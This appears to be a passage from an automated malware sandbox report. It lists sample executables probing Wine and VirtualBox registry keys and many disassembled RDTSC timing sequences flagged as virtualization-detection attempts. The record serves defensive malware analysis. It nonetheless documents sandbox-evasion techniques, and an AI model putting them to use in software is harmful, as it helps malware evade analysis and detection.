                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Tries to detect virtualization through RDTSC time measurements
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD312 second address: BAD31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD31A second address: BAD31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD31E second address: BAD322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37404 second address: D3742C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1228D24AC8h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D266D7 second address: D26715 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F122870CBC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F122870CBD6h 0x00000011 je 00007F122870CBE0h 0x00000017 jmp 00007F122870CBD4h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39FB9 second address: D39FD0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1228D24AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39FD0 second address: D39FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A1DF second address: D3A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 234BF1CFh 0x0000000d mov cx, 47D9h 0x00000011 lea ebx, dword ptr [ebp+12460E93h] 0x00000017 mov dx, 2738h 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jl 00007F1228D24AB6h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A2C8 second address: D3A2DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A2DB second address: D3A2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A2E1 second address: D3A35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F122870CBD3h 0x0000000b pop esi 0x0000000c popad 0x0000000d nop 0x0000000e mov si, cx 0x00000011 and edx, dword ptr [ebp+122D3905h] 0x00000017 push 00000000h 0x00000019 mov esi, 0FB81FD7h 0x0000001e je 00007F122870CBC9h 0x00000024 call 00007F122870CBC9h 0x00000029 pushad 0x0000002a push ebx 0x0000002b jbe 00007F122870CBC6h 0x00000031 pop ebx 0x00000032 pushad 0x00000033 jmp 00007F122870CBCDh 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b popad 0x0000003c push eax 0x0000003d jp 00007F122870CBCEh 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F122870CBD0h 0x0000004e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A35F second address: D3A369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F1228D24AB6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A369 second address: D3A388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A388 second address: D3A38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A38F second address: D3A3AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBD8h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AA2B second address: D5AA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1228D24AB6h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007F1228D24AC7h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AA55 second address: D5AA7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c push ebx 0x0000000d jmp 00007F122870CBCBh 0x00000012 pop ebx 0x00000013 jo 00007F122870CBD2h 0x00000019 jg 00007F122870CBC6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58938 second address: D5893E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5893E second address: D5894F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F122870CBC6h 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5894F second address: D5895A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58AA7 second address: D58AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58C2E second address: D58C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1228D24AC8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58C4E second address: D58C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D92 second address: D58D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D9E second address: D58DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58DA2 second address: D58DA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58EF0 second address: D58F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD0h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58F08 second address: D58F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24ABAh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F1228D24AB6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58F26 second address: D58F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58F2A second address: D58F32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58F32 second address: D58F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F122870CBC6h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D591D8 second address: D591DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D591DF second address: D591EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F122870CBC6h 0x0000000a jne 00007F122870CBC6h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D591EF second address: D591F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5951F second address: D59547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jno 00007F122870CBCEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F122870CBCFh 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59547 second address: D59551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59551 second address: D59557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1D7 second address: D5A1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1DF second address: D5A1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A34B second address: D5A351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A351 second address: D5A355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A355 second address: D5A367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1228D24ABCh 0x0000000c jnp 00007F1228D24AB6h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A367 second address: D5A36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A4B4 second address: D5A4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A4BA second address: D5A4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A618 second address: D5A61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A61C second address: D5A629 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A629 second address: D5A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F1228D24AB6h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A638 second address: D5A63C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A63C second address: D5A642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A8DD second address: D5A8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D613DF second address: D613E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D613E3 second address: D61411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jc 00007F122870CBF0h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F122870CBCCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61411 second address: D61415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61415 second address: D61421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61421 second address: D61425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A938 second address: D1A93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63F0C second address: D63F28 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F1228D24ABCh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6445A second address: D64462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D645D8 second address: D645E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1228D24AB6h 0x0000000a pop ecx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D645E3 second address: D645EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F122870CBC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66528 second address: D6652C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6652C second address: D66532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66532 second address: D66538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66853 second address: D66869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D669FA second address: D66A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1228D24AB6h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66A05 second address: D66A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66B89 second address: D66B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67522 second address: D67547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F122870CBD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F122870CBC6h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675C0 second address: D675C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675C4 second address: D675CE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675CE second address: D675D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675D4 second address: D675D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D675D8 second address: D67633 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F1228D24AC8h 0x00000013 jmp 00007F1228D24ABDh 0x00000018 pop edi 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jmp 00007F1228D24AC2h 0x00000022 pop ecx 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67AEA second address: D67AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67AEE second address: D67AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67BB6 second address: D67BBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D695B9 second address: D69655 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1228D24ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push edx 0x0000000d jne 00007F1228D24AB6h 0x00000013 pop edx 0x00000014 pop esi 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F1228D24AB8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 xor dword ptr [ebp+122D2122h], eax 0x00000036 push 00000000h 0x00000038 mov esi, 20C90F29h 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F1228D24AB8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Bh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 movzx esi, cx 0x0000005c xchg eax, ebx 0x0000005d jl 00007F1228D24ACFh 0x00000063 jmp 00007F1228D24AC9h 0x00000068 push eax 0x00000069 jl 00007F1228D24AD5h 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69655 second address: D69659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A09F second address: D6A0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AB7D second address: D6AB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A8C5 second address: D6A8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AB83 second address: D6AB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A8C9 second address: D6A8CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AB87 second address: D6AB8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6AB8B second address: D6ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F1228D24ABBh 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D38FDh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F1228D24AB8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+122D3719h] 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c jnc 00007F1228D24AB8h 0x00000042 push esi 0x00000043 pushad 0x00000044 popad 0x00000045 pop esi 0x00000046 popad 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ABE6 second address: D6ABEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ABEC second address: D6ABF6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1228D24ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
